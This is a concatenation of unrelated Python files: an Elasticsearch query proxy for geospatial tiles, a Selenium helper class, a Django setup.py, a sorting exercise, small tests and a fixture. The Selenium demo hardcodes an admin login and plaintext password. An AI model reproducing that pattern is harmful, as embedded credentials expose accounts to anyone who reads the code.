ELASTICSEARCH_CON_LOCK = threading.Lock()
thread_local = threading.local()
EPOCH = timezone('UTC').localize(datetime(1970, 1, 1))
ELASTICSEARCH_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
ISO_8601 = '%Y-%m-%dT%H:%M:%S%z'
class ElasticsearchProxy(object):
def __init__(self, config):
self.elasticsearchHosts = config.get("elasticsearch", "host").split(',')
self.elasticsearchIndex = config.get("elasticsearch", "index")
self.elasticsearchUsername = config.get("elasticsearch", "username")
self.elasticsearchPassword = config.get("elasticsearch", "password")
self.logger = logging.getLogger(__name__)
with ELASTICSEARCH_CON_LOCK:
elasticsearchcon = getattr(thread_local, 'elasticsearchcon', None)
if elasticsearchcon is None:
elasticsearchcon = Elasticsearch(hosts=self.elasticsearchHosts, http_auth=(self.elasticsearchUsername, self.elasticsearchPassword))
thread_local.elasticsearchcon = elasticsearchcon
self.elasticsearchcon = elasticsearchcon
def find_tile_by_id(self, tile_id):
params = {
"size": 1,
"query": {
"term": {
"id": {
"value": tile_id
}
}
}
}
results, _, hits = self.do_query(*(None, None, None, True, None), **params)
assert hits == 1, f"Found {hits} results, expected exactly 1"
return [results[0]["_source"]]
def find_tiles_by_id(self, tile_ids, ds=None, **kwargs):
params = {
"query": {
"bool": {
"filter": [],
"should": [],
"minimum_should_match": 1
}
}
}
for tile_id in tile_ids:
params['query']['bool']['should'].append({"term": {"id": {"value": tile_id}}})
if ds is not None:
params['query']['bool']['filter'].append({"term": {"dataset_s": {"value": ds}}})
self._merge_kwargs(params, **kwargs)
results = self.do_query_all(*(None, None, None, False, None), **params)
assert len(results) == len(tile_ids), "Found %s results, expected exactly %s" % (len(results), len(tile_ids))
return results
def find_min_date_from_tiles(self, tile_ids, ds=None, **kwargs):
params = {
"size": 0,
"query": {
"bool": {
"filter": [],
"should": []
}
},
"aggs": {
"min_date_agg": {
"min": {
"field": "tile_min_time_dt"
}
}
}
}
for tile_id in tile_ids:
params['query']['bool']['should'].append({"term": {"id": {"value": tile_id}}})
if ds is not None:
params['query']['bool']['filter'].append({"term": {"dataset_s": {"value": ds}}})
aggregations = self.do_aggregation(*(None, None, None, True, None), **params)
return self.convert_iso_to_datetime(aggregations['min_date_agg']["value_as_string"])
def find_max_date_from_tiles(self, tile_ids, ds=None, **kwargs):
params = {
"size": 0,
"query": {
"bool": {
"filter": [],
"should": []
}
},
"aggs": {
"max_date_agg": {
"max": {
"field": "tile_max_time_dt"
}
}
}
}
for tile_id in tile_ids:
params['query']['bool']['should'].append({"term": {"id": {"value": tile_id}}})
if ds is not None:
params['query']['bool']['filter'].append({"term": {"dataset_s": {"value": ds}}})
aggregations = self.do_aggregation(*(None, None, None, True, None), **params)
return self.convert_iso_to_datetime(aggregations['max_date_agg']["value_as_string"])
def find_min_max_date_from_granule(self, ds, granule_name, **kwargs):
params = {
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"term": {
"granule_s": {
"value": granule_name
}
}
}
]
}
},
"aggs": {
"min_date_agg": {
"max": {
"field": "tile_min_time_dt"
}
},
"max_date_agg": {
"max": {
"field": "tile_max_time_dt"
}
}
}
}
self._merge_kwargs(params, **kwargs)
aggregations = self.do_aggregation(*(None, None, None, False, None), **params)
start_time = self.convert_iso_to_datetime(aggregations['min_date_agg']["value_as_string"])
end_time = self.convert_iso_to_datetime(aggregations['max_date_agg']["value_as_string"])
return start_time, end_time
def get_data_series_list(self):
datasets = self.get_data_series_list_simple()
for dataset in datasets:
min_date = self.find_min_date_from_tiles([], ds=dataset['title'])
max_date = self.find_max_date_from_tiles([], ds=dataset['title'])
dataset['start'] = (min_date - EPOCH).total_seconds()
dataset['end'] = (max_date - EPOCH).total_seconds()
dataset['iso_start'] = min_date.strftime(ISO_8601)
dataset['iso_end'] = max_date.strftime(ISO_8601)
return datasets
def get_data_series_list_simple(self):
params = {
'size': 0,
"aggs": {
"dataset_list_agg": {
"composite": {
"size":100,
"sources": [
{
"dataset_s": {
"terms": {
"field": "dataset_s"
}
}
}
]
}
}
}
}
aggregations = self.do_aggregation_all(params, 'dataset_list_agg')
l = []
for dataset in aggregations:
l.append({
"shortName": dataset['key']['dataset_s'],
"title": dataset['key']['dataset_s'],
"tileCount": dataset["doc_count"]
})
l = sorted(l, key=lambda entry: entry["title"])
return l
def get_data_series_stats(self, ds):
params = {
"size": 0,
"query": {
"term":{
"dataset_s": {
"value": ds
}
}
},
"aggs": {
"available_dates": {
"composite": {
"size": 100,
"sources": [
{"terms_tile_max_time_dt": {"terms": {"field": "tile_max_time_dt"}}}
]
}
}
}
}
aggregations = self.do_aggregation_all(params, 'available_dates')
stats = {}
stats['available_dates'] = []
for dt in aggregations:
stats['available_dates'].append(dt['key']['terms_tile_max_time_dt'] / 1000)
stats['available_dates'] = sorted(stats['available_dates'])
params = {
"size": 0,
"query": {
"term":{
"dataset_s": {
"value": ds
}
}
},
"aggs": {
"min_tile_min_val_d": {
"min": {
"field": "tile_min_val_d"
}
},
"min_tile_max_time_dt": {
"min": {
"field": "tile_max_time_dt"
}
},
"max_tile_max_time_dt": {
"max": {
"field": "tile_max_time_dt"
}
},
"max_tile_max_val_d": {
"max": {
"field": "tile_max_val_d"
}
}
}
}
aggregations = self.do_aggregation(*(None, None, None, False, None), **params)
stats["start"] = int(aggregations["min_tile_max_time_dt"]["value"]) / 1000
stats["end"] = int(aggregations["max_tile_max_time_dt"]["value"]) / 1000
stats["minValue"] = aggregations["min_tile_min_val_d"]["value"]
stats["maxValue"] = aggregations["max_tile_max_val_d"]["value"]
return stats
# day_of_year_i added (SDAP-347)
def find_tile_by_polygon_and_most_recent_day_of_year(self, bounding_polygon, ds, day_of_year):
max_lat = bounding_polygon.bounds[3]
min_lon = bounding_polygon.bounds[0]
min_lat = bounding_polygon.bounds[1]
max_lon = bounding_polygon.bounds[2]
params = {
"size": "1",
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat], [max_lon, min_lat]]
},
"relation": "intersects"
}
}
},
{
"range": {
"tile_count_i": {
"gte": 1
}
}
},
{
"range": {
"day_of_year_i": {
"lte": day_of_year
}
}
}
]
}
}
}
result, _, _ = self.do_query(*(None, None, None, True, 'day_of_year_i desc'), **params)
return [result[0]]
def find_days_in_range_asc(self, min_lat, max_lat, min_lon, max_lon, ds, start_time, end_time, **kwargs):
search_start_s = datetime.utcfromtimestamp(start_time).strftime(ELASTICSEARCH_FORMAT)
search_end_s = datetime.utcfromtimestamp(end_time).strftime(ELASTICSEARCH_FORMAT)
params = {
"size": "0",
"_source": "tile_min_time_dt",
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"range": {
"tile_min_time_dt": {
"gte": search_start_s,
"lte": search_end_s
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat],[max_lon, min_lat]]
},
"relation": "intersects"
}
}
}
]
}
},
"aggs": {
"days_range_agg": {
"composite": {
"size":100,
"sources": [
{
"tile_min_time_dt": {
"terms": {
"field": "tile_min_time_dt"
}
}
}
]
}
}
}
}
aggregations = self.do_aggregation_all(params, 'days_range_agg')
results = [res['key']['tile_min_time_dt'] for res in aggregations]
daysinrangeasc = sorted([(res / 1000) for res in results])
return daysinrangeasc
def find_all_tiles_in_box_sorttimeasc(self, min_lat, max_lat, min_lon, max_lon, ds, start_time=0,
end_time=-1, **kwargs):
params = {
"size": 1000,
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat],[max_lon, min_lat]]
},
"relation": "intersects"
}
}
},
{
"range": {
"tile_count_i": {
"gte": 1
}
}
}
]
}
}
}
if 0 < start_time <= end_time:
params["query"]["bool"]["should"] = self.get_formatted_time_clause(start_time, end_time)
params["query"]["bool"]["minimum_should_match"] = 1
self._merge_kwargs(params, **kwargs)
return self.do_query_all(*(None, None, None, False, 'tile_min_time_dt asc,tile_max_time_dt asc'), **params)
def find_all_tiles_in_polygon_sorttimeasc(self, bounding_polygon, ds, start_time=0, end_time=-1, **kwargs):
nums = re.findall(r'\d+(?:\.\d*)?', bounding_polygon.wkt.rpartition(',')[0])
polygon_coordinates = list(zip(*[iter(nums)] * 2))
max_lat = bounding_polygon.bounds[3]
min_lon = bounding_polygon.bounds[0]
min_lat = bounding_polygon.bounds[1]
max_lon = bounding_polygon.bounds[2]
params = {
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat], [max_lon, min_lat]]
},
"relation": "intersects"
}
}
}
]
}
}
}
try:
if 'fl' in list(kwargs.keys()):
params["_source"] = kwargs["fl"].split(',')
except KeyError:
pass
if 0 < start_time <= end_time:
params["query"]["bool"]["should"] = self.get_formatted_time_clause(start_time, end_time)
params["query"]["bool"]["minimum_should_match"] = 1
return self.do_query_all(*(None, None, None, False, 'tile_min_time_dt asc,tile_max_time_dt asc'), **params)
def find_all_tiles_in_polygon(self, bounding_polygon, ds, start_time=0, end_time=-1, **kwargs):
nums = re.findall(r'\d+(?:\.\d*)?', bounding_polygon.wkt.rpartition(',')[0])
polygon_coordinates = list(zip(*[iter(nums)] * 2))
max_lat = bounding_polygon.bounds[3]
min_lon = bounding_polygon.bounds[0]
min_lat = bounding_polygon.bounds[1]
max_lon = bounding_polygon.bounds[2]
params = {
"size": 1000,
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat], [max_lon, min_lat]]
},
"relation": "intersects"
}
}
},
{
"range": {
"tile_count_i": {
"gte": 1
}
}
}
]
}
}
}
try:
if 'fl' in list(kwargs.keys()):
params["_source"] = kwargs["fl"].split(',')
except KeyError:
pass
if 0 < start_time <= end_time:
params["query"]["bool"]["should"] = self.get_formatted_time_clause(start_time, end_time)
params["query"]["bool"]["minimum_should_match"] = 1
self._merge_kwargs(params, **kwargs)
return self.do_query_all(*(None, None, None, False, None), **params)
def find_distinct_bounding_boxes_in_polygon(self, bounding_polygon, ds, start_time=0, end_time=-1, **kwargs):
tile_max_lat = bounding_polygon.bounds[3]
tile_min_lon = bounding_polygon.bounds[0]
tile_min_lat = bounding_polygon.bounds[1]
tile_max_lon = bounding_polygon.bounds[2]
params = {
"size": 0,
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[tile_min_lon, tile_max_lat], [tile_max_lon, tile_min_lat]]
},
"relation": "intersects"
}
}
}
]
}
},
"aggs": {
"distinct_bounding_boxes": {
"composite": {
"size": 100,
"sources": [
{
"bounding_box": {
"terms": {
"script": {
"source": "String.valueOf(doc['tile_min_lon'].value) + ', ' + String.valueOf(doc['tile_max_lon'].value) + ', ' + String.valueOf(doc['tile_min_lat'].value) + ', ' + String.valueOf(doc['tile_max_lat'].value)",
"lang": "painless"
}
}
}
}
]
}
}
}
}
if 0 < start_time <= end_time:
params["query"]["bool"]["should"] = self.get_formatted_time_clause(start_time, end_time)
params["query"]["bool"]["minimum_should_match"] = 1
self._merge_kwargs(params, **kwargs)
aggregations = self.do_aggregation_all(params, 'distinct_bounding_boxes')
distinct_bounds = []
for agg in aggregations:
coords = agg['key']['bounding_box'].split(',')
min_lon = round(float(coords[0]), 2)
max_lon = round(float(coords[1]), 2)
min_lat = round(float(coords[2]), 2)
max_lat = round(float(coords[3]), 2)
polygon = 'POLYGON((%s %s, %s %s, %s %s, %s %s, %s %s))' % (min_lon, max_lat, min_lon, min_lat, max_lon, min_lat, max_lon, max_lat, min_lon, max_lat)
distinct_bounds.append(wkt.loads(polygon).bounds)
return distinct_bounds
def find_tiles_by_exact_bounds(self, minx, miny, maxx, maxy, ds, start_time=0, end_time=-1, **kwargs):
params = {
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"term": {
"tile_min_lon": {
"value": minx
}
}
},
{
"term": {
"tile_min_lat": {
"value": miny
}
}
},
{
"term": {
"tile_max_lon": {
"value": maxx
}
}
},
{
"term": {
"tile_max_lat": {
"value": maxy
}
}
}
]
}
}}
if 0 < start_time <= end_time:
params["query"]["bool"]["should"] = self.get_formatted_time_clause(start_time, end_time)
params["query"]["bool"]["minimum_should_match"] = 1
self._merge_kwargs(params, **kwargs)
return self.do_query_all(*(None, None, None, False, None), **params)
def find_all_tiles_in_box_at_time(self, min_lat, max_lat, min_lon, max_lon, ds, search_time, **kwargs):
the_time = datetime.utcfromtimestamp(search_time).strftime(ELASTICSEARCH_FORMAT)
params = {
"size": 1000,
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat],[max_lon, min_lat]]
},
"relation": "intersects"
}
}
},
{
"range": {
"tile_min_time_dt": {
"lte": the_time
}
}
},
{
"range": {
"tile_max_time_dt": {
"gte": the_time
}
}
}
]
}
}
}
self._merge_kwargs(params, **kwargs)
return self.do_query_all(*(None, None, None, False, None), **params)
def find_all_tiles_in_polygon_at_time(self, bounding_polygon, ds, search_time, **kwargs):
the_time = datetime.utcfromtimestamp(search_time).strftime(ELASTICSEARCH_FORMAT)
max_lat = bounding_polygon.bounds[3]
min_lon = bounding_polygon.bounds[0]
min_lat = bounding_polygon.bounds[1]
max_lon = bounding_polygon.bounds[2]
params = {
"size": 1000,
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat],[max_lon, min_lat]]
},
"relation": "intersects"
}
}
},
{ "range": {
"tile_min_time_dt": {
"lte": the_time
}
} },
{ "range": {
"tile_max_time_dt": {
"gte": the_time
}
} }
]
}
}
}
self._merge_kwargs(params, **kwargs)
return self.do_query_all(*(None, None, None, False, None), **params)
def find_all_tiles_within_box_at_time(self, min_lat, max_lat, min_lon, max_lon, ds, time, **kwargs):
the_time = datetime.utcfromtimestamp(time).strftime(ELASTICSEARCH_FORMAT)
params = {
"size": 1000,
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat],[max_lon, min_lat]]
},
"relation": "within"
}
}
},
{
"range": {
"tile_count_i": {
"gte": 1
}
}
},
{
"range": {
"tile_min_time_dt": {
"lte": the_time
}
}
},
{
"range": {
"tile_max_time_dt": {
"gte": the_time
}
}
}
]
}
}
}
self._merge_kwargs(params, **kwargs)
return self.do_query_all(*(None, "product(tile_avg_val_d, tile_count_i),*", None, False, None), **params)
def find_all_boundary_tiles_at_time(self, min_lat, max_lat, min_lon, max_lon, ds, time, **kwargs):
the_time = datetime.utcfromtimestamp(time).strftime(ELASTICSEARCH_FORMAT)
params = {
"size": 1000,
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "multilinestring",
"coordinates": [[[min_lon, max_lat], [max_lon, max_lat], [min_lon, max_lat], [min_lon, min_lat], [max_lon, max_lat], [max_lon, min_lat], [min_lon, min_lat], [max_lon, min_lat]]]
},
"relation": "intersects"
}
}
},
{
"range": {
"tile_count_i": {
"gte": 1
}
}
},
{
"range": {
"tile_min_time_dt": {
"lte": the_time
}
}
},
{
"range": {
"tile_max_time_dt": {
"gte": the_time
}
}
}
],
"must_not" : {
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat], [max_lon, min_lat]]
},
"relation": "within"
}
}
}
}
}
}
self._merge_kwargs(params, **kwargs)
return self.do_query_all(*(None, None, None, False, None), **params)
def find_all_tiles_by_metadata(self, metadata, ds, start_time=0, end_time=-1, **kwargs):
"""
Get a list of tile metadata that matches the specified metadata, start_time, end_time.
:param metadata: List of metadata values to search for tiles e.g ["river_id_i:1", "granule_s:granule_name"]
:param ds: The dataset name to search
:param start_time: The start time to search for tiles
:param end_time: The end time to search for tiles
:return: A list of tile metadata
"""
params = {
"query": {
"bool": {
"must": [
{
"term": {
"dataset_s": {"value": ds}
}
}
]
}
}
}
if len(metadata) > 0:
for key_value in metadata:
key = key_value.split(':')[0]
value = key_value.split(':')[1]
params['query']['bool']['must'].append({"match": {key: value}})
if 0 < start_time <= end_time:
params['query']['bool']['should'] = self.get_formatted_time_clause(start_time, end_time)
params["query"]["bool"]["minimum_should_match"] = 1
self._merge_kwargs(params, **kwargs)
return self.do_query_all(*(None, None, None, False, None), **params)
def get_formatted_time_clause(self, start_time, end_time):
search_start_s = datetime.utcfromtimestamp(start_time).strftime(ELASTICSEARCH_FORMAT)
search_end_s = datetime.utcfromtimestamp(end_time).strftime(ELASTICSEARCH_FORMAT)
time_clause = [
{
"range": {
"tile_min_time_dt": {
"lte": search_end_s,
"gte": search_start_s
}
}
},
{
"range": {
"tile_max_time_dt": {
"lte": search_end_s,
"gte": search_start_s
}
}
},
{
"bool": {
"must": [
{
"range": {
"tile_min_time_dt": {
"gte": search_start_s
}
}
},
{
"range": {
"tile_max_time_dt": {
"lte": search_end_s
}
}
}
]
}
}
]
return time_clause
def get_tile_count(self, ds, bounding_polygon=None, start_time=0, end_time=-1, metadata=None, **kwargs):
"""
Return number of tiles that match search criteria.
:param ds: The dataset name to search
:param bounding_polygon: The polygon to search for tiles
:param start_time: The start time to search for tiles
:param end_time: The end time to search for tiles
:param metadata: List of metadata values to search for tiles e.g ["river_id_i:1", "granule_s:granule_name"]
:return: number of tiles that match search criteria
"""
params = {
"size": 0,
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"range": {
"tile_count_i": {
"gte": 1
}
}
}
]
}
}
}
if bounding_polygon:
min_lon, min_lat, max_lon, max_lat = bounding_polygon.bounds
geo_clause = {
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat], [max_lon, min_lat]]
}
}
}
}
params['query']['bool']['filter'].append(geo_clause)
if 0 < start_time <= end_time:
params['query']['bool']['should'] = self.get_formatted_time_clause(start_time, end_time)
params["query"]["bool"]["minimum_should_match"] = 1
if len(metadata) > 0:
for key_value in metadata:
key = key_value.split(':')[0]
value = key_value.split(':')[1]
params['query']['bool']['filter'].append({"term": {key: {"value": value}}})
self._merge_kwargs(params, **kwargs)
_, _, found = self.do_query(*(None, None, None, True, None), **params)
return found
def do_aggregation(self, *args, **params):
# Gets raw aggregations
response = self.do_query_raw(*args, **params)
aggregations = response.get('aggregations', None)
return aggregations
def do_aggregation_all(self, params, agg_name):
# Used for pagination when results can exceed ES max size (use of after_key)
with ELASTICSEARCH_CON_LOCK:
response = self.elasticsearchcon.search(index=self.elasticsearchIndex, body=params)
all_buckets = []
try:
aggregations = response.get('aggregations', None)
current_buckets = aggregations.get(agg_name, None)
buckets = current_buckets.get('buckets', None)
all_buckets += buckets
after_bucket = current_buckets.get('after_key', None)
while after_bucket is not None:
for agg in params['aggs']:
params['aggs'][agg]['composite']['after'] = {}
for source in params['aggs'][agg]['composite']['sources']:
key_name = next(iter(source))
params['aggs'][agg]['composite']['after'][key_name] = after_bucket[key_name]
with ELASTICSEARCH_CON_LOCK:
response = self.elasticsearchcon.search(index=self.elasticsearchIndex, body=params)
aggregations = response.get('aggregations', None)
current_buckets = aggregations.get(agg_name, None)
buckets = current_buckets.get('buckets', None)
all_buckets += buckets
after_bucket = current_buckets.get('after_key', None)
except AttributeError as e:
self.logger.error('Error when accessing aggregation buckets - ' + str(e))
return all_buckets
def do_query(self, *args, **params):
response = self.do_query_raw(*args, **params)
return response['hits']['hits'], None, response['hits']['total']['value']
def do_query_raw(self, *args, **params):
if args[4]:
sort_fields = args[4].split(",")
if 'sort' not in list(params.keys()):
params["sort"] = []
for field in sort_fields:
field_order = field.split(' ')
sort_instruction = {field_order[0]: field_order[1]}
if sort_instruction not in params['sort']:
params["sort"].append(sort_instruction)
with ELASTICSEARCH_CON_LOCK:
response = self.elasticsearchcon.search(index=self.elasticsearchIndex, body=params)
return response
def do_query_all(self, *args, **params):
# Used to paginate with search_after.
# The method calling this might already have a sort clause,
# so we merge both sort clauses inside do_query_raw
results = []
search = None
# Set track_total_hits so the hit count is not capped at 10,000 per worker
if 'track_total_hits' not in params.keys():
params['track_total_hits'] = True
# Add a deterministic sort order so the results can be paginated with search_after:
params["sort"] = [
{ "tile_min_time_dt": "asc"},
{ "_id": "asc" }
]
response = self.do_query_raw(*args, **params)
results.extend([r["_source"] for r in response["hits"]["hits"]])
total_hits = response["hits"]["total"]["value"]
try:
search_after = []
for sort_param in response["hits"]["hits"][-1]["sort"]:
search_after.append(str(sort_param))
except (KeyError, IndexError):
search_after = []
try:
while len(results) < total_hits:
params["search_after"] = search_after
response = self.do_query_raw(*args, **params)
results.extend([r["_source"] for r in response["hits"]["hits"]])
search_after = []
for sort_param in response["hits"]["hits"][-1]["sort"]:
search_after.append(str(sort_param))
except (KeyError, IndexError):
pass
return results
def convert_iso_to_datetime(self, date):
return datetime.strptime(date, "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=UTC)
def convert_iso_to_timestamp(self, date):
return (self.convert_iso_to_datetime(date) - EPOCH).total_seconds()
@staticmethod
def _merge_kwargs(params, **kwargs):
# Only Solr-specific kwargs are parsed
# And the special 'limit'
try:
params['limit'] = kwargs['limit']
except KeyError:
pass
try:
params['_route_'] = kwargs['_route_']
except KeyError:
pass
try:
params['size'] = kwargs['size']
except KeyError:
pass
try:
params['start'] = kwargs['start']
except KeyError:
pass
try:
s = kwargs['sort'] if isinstance(kwargs['sort'], list) else [kwargs['sort']]
except KeyError:
s = None
try:
params['sort'].extend(s)
except KeyError:
if s is not None:
params['sort'] = s
|
from ..extensions import marshmallow
from marshmallow import post_dump
import pycountry
class UserInformationSchema(marshmallow.Schema):
class Meta:
fields = ('country', 'bio')
@post_dump
def country_alpha_2_to_name(self, in_data):
""" Transform country alpha_2 to country name """
in_data['country'] = [x.name for x in pycountry.countries if x.alpha_2 == in_data['country']][0].capitalize()
return in_data
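# Illustrative example (assumed data, not from the original project): dumping
# {'country': 'DE', 'bio': '...'} yields {'country': 'Germany', 'bio': '...'}.
# Note that str.capitalize() lowercases every character after the first, so
# multi-word names such as "United States" come out as "United states".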
|
#!/usr/bin/env python
from setuptools import setup
setup(
# GETTING-STARTED: set your app name:
name='PrezisBackend',
# GETTING-STARTED: set your app version:
version='1.0.0',
# GETTING-STARTED: set your app description:
description='Backend service for PrezisUI',
# GETTING-STARTED: set author name (your name):
author='Boros Gabor',
# GETTING-STARTED: set author email (your email):
author_email='gabor.brs@gmail.com',
# GETTING-STARTED: set author url (your url):
url='https://hu.linkedin.com/in/gaborbrs',
# GETTING-STARTED: define required django version:
install_requires=[
'Django==1.9.4',
'djangorestframework',
'django-cors-headers',
'django-filter',
'django-extensions',
],
dependency_links=[
'https://pypi.python.org/simple/django/',
'https://pypi.python.org/simple/djangorestframework/'
],
)
|
from selenium import webdriver
from time import sleep
from selenium.webdriver.support.select import Select
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
class Base():
def __init__(self,driver:webdriver.Firefox):
self.driver = driver
self.timeout=10
self.t = 0.5
# Locate an element with an expected condition (EC); return it if found, otherwise a timeout error is raised
def findEleByEC(self,locator):
ele = WebDriverWait(self.driver, self.timeout,self.t).until(EC.presence_of_element_located(locator))
return ele
def findElement(self,locator):
ele = WebDriverWait(self.driver, self.timeout,self.t).until(lambda x: x.find_element(*locator))
# element = WebDriverWait(driver, 10,1).until(lambda x: x.find_element_by_id("someId"))
return ele
def findElements(self,locator):
# element = WebDriverWait(driver, 10,1).until(lambda x: x.find_element_by_id("someId"))
eles = WebDriverWait(self.driver, self.timeout,self.t).until(lambda x: x.find_elements(*locator))
return eles
def sendKeys(self,locator,text):
ele = self.findElement(locator)
ele.send_keys(text)
def click(self,locator):
ele = self.findElement(locator)
ele.click()
def clear(self,locator):
ele = self.findElement(locator)
ele.clear()
def isSelected(self,locator):
'''
Check whether the element is selected
'''
ele = self.findElement(locator)
r = ele.is_selected()
return r
# First way to check whether an element exists
def isElementExist(self,locator):
try:
ele=self.findElement(locator)
return True
except Exception as info:
print(info)
return False
# Second way to check whether an element exists
def isElementExist2(self,locator):
eles=self.findElements(locator)
n = len(eles)
if n == 0:
return False
elif n ==1:
return True
else:
print("定位到元素的个数:%d" % n)
return True
# Title check with EC, method 1: EC.title_is(_title)
def is_title(self,_title):
"""
:param _title: the expected title
:return: True or False
"""
try:
result= WebDriverWait(self.driver, self.timeout,self.t).until(EC.title_is(_title))
return result
except:
return False
# Title check with EC, method 2: EC.title_contains(_title)
def is_title_contains(self,_title):
"""
:param _title: the expected (partial) title
:return: True or False
"""
try:
result= WebDriverWait(self.driver, self.timeout,self.t).until(EC.title_contains(_title))
return result
except:
return False
# Check whether the given text is present in the element
def is_text_in_element(self,locator,_text):
"""
Check whether the given text is present in the element
:param _text: the expected text
:return: True or False
"""
try:
result= WebDriverWait(self.driver, self.timeout,self.t).until(EC.text_to_be_present_in_element(locator,_text))
return result
except:
return False
# Check the value attribute of an element
def is_value_in_element(self,locator,_value):
"""
:param locator:
:param _value:
:return: False if the value is empty or does not match, True if it matches
"""
try:
result = WebDriverWait(self.driver, self.timeout,self.t).until(EC.text_to_be_present_in_element_value(locator,_value))
return result
except:
return False
def is_alert(self):
"""
:return: the alert object if an alert is present; its attributes can then be read from the returned object
"""
try:
result = WebDriverWait(self.driver,self.timeout,self.t).until(EC.alert_is_present())
return result
except:
return False
def get_text(self,locator):
"""
Get the text of an element
:param locator: the locator
:return: the element text on success, an empty string on failure
"""
try:
t = self.findElement(locator).text
return t
except:
print("获取文本失败,返回'' ")
return ""
# Wrap the mouse-hover action
def move_to_element(self,locator):
ele = self.findElement(locator)
ActionChains(self.driver).move_to_element(ele).perform()
# Wrap the Select helpers: select by index, by value and by visible text
# The select element must be located first
def select_by_index(self,locator,index=0):
ele = self.findElement(locator)
Select(ele).select_by_index(index)
def select_by_valuex(self,locator,value):
ele = self.findElement(locator)
Select(ele).select_by_value(value)
def select_by_text(self,locator,text):
ele = self.findElement(locator)
Select(ele).select_by_visible_text(text)
# Browser scrolling via JavaScript
# Scroll the given element into view
def js_focus_element(self,locator):
target = self.findElement(locator)
self.driver.execute_script("arguments[0].scrollIntoView();",target)
# Scroll to the top of the page
def js_scroll_top(self):
js = "window.scrollTo(0,0)"
self.driver.execute_script(js)
# Scroll to the bottom of the page
def js_scroll_bottom(self):
js = "window.scrollTo(0,document.body.scrollHeight)"
self.driver.execute_script(js)
# Horizontal scroll to x while staying at the bottom of the page
def js_scroll_Hengxiang(self,x=0):
js = "window.scrollTo(%s,document.body.scrollHeight)" %x
self.driver.execute_script(js)
if __name__ == '__main__':
driver = webdriver.Firefox()
driver.get("http://127.0.0.1:82/zentao/user-login-L3plbnRhby8=.html")
zentao = Base(driver)
# loc1 = (By.ID, "account")
# loc2 = (By.NAME, "password")
# loc3 = (By.CSS_SELECTOR, "#submit")
loc1 = ("id","account");
loc2 = ("name","password")
loc3 = ("css selector","#submit")
zentao.sendKeys(loc1,"admin")
zentao.sendKeys(loc2,"Yanfengmusic521")
zentao.click(loc3)
|
"""
Write a program that receives two lists of integers and merges them into a single
list sorted in non-decreasing order.
Example
Input                    Output
[1,5,2,7],[3,2,9]        [1,2,2,3,5,7,9]
[50,30,10],[15,10,5]     [5,10,10,15,30,50]
"""
# Solution
l1=[52, 65, 26, 58, 84, 33, 37, 38, 85, 82]
l2=[59, 29, 85, 29, 41, 85, 55, 59, 31, 57]
tamanho=len(l1)+len(l2)
cont1=0
cont2=0
lmerge=[]
for j in range(1, len(l1), 1):
for i in range(0, len(l1)-1, 1):
if l1[i]>l1[i+1]:
l1[i],l1[i+1]=l1[i+1],l1[i]
for j in range(1, len(l2), 1):
for i in range(0, len(l2)-1, 1):
if l2[i]>l2[i+1]:
l2[i],l2[i+1]=l2[i+1],l2[i]
print(l1)
print(l2)
for i in range(1, tamanho+1, 1):
if cont1<len(l1) and cont2<len(l2):
if l1[cont1]<=l2[cont2]:
lmerge.append(l1[cont1])
cont1+=1
else:
lmerge.append(l2[cont2])
cont2+=1
elif cont1>=len(l1):
lmerge.append(l2[cont2])
cont2+=1
else:
lmerge.append(l1[cont1])
cont1+=1
print(lmerge)
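# Alternative sketch (illustrative, not part of the original exercise): the same
# merged result can be produced with Python's built-ins; l1 and l2 are already
# sorted at this point, so heapq.merge works directly.
import heapq
alternativa = list(heapq.merge(l1, l2))
assert alternativa == sorted(l1 + l2) == lmerge
print(alternativa)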
|
"""
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
from ..interpolated_functions import interpolated_distmod
def test_dist_mod():
z = np.linspace(0,1,100)
d = interpolated_distmod(z)
assert np.all(d >= 0.0)
|
import pytest
from ProxyO.parser import ProxyServer, ProxyO
import faker
@pytest.fixture(scope='function')
def proxy_parser():
def _proxy_parser(type_=False, data=False):
if type_:
fake = faker.Faker()
fake_dict = dict(
ip=fake.ipv4(),
country=dict(),
anonymity=fake.word(),
uptime=float(fake.random_number()),
port=fake.random_number(),
)
